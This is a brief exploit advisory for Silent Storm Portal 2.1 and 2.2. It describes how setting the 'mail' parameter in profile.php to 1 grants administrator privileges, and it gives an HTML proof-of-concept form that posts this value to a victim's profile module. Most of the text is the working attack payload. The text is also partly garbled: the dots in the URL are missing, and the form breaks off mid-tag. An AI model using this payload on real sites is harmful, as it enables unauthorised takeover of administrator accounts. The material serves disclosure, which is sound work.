profile.php in Silent Storm Portal 2.1 and 2.2 allows remote malicious users to gain privileges by setting the mail parameter to 1, which is the value for an administrator.
Demonstration:
Register a user account then login and run the exploithtml
---exploithtml----
<form method="post" action="wwwvictimcom/indexphp?module=//profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" nam ...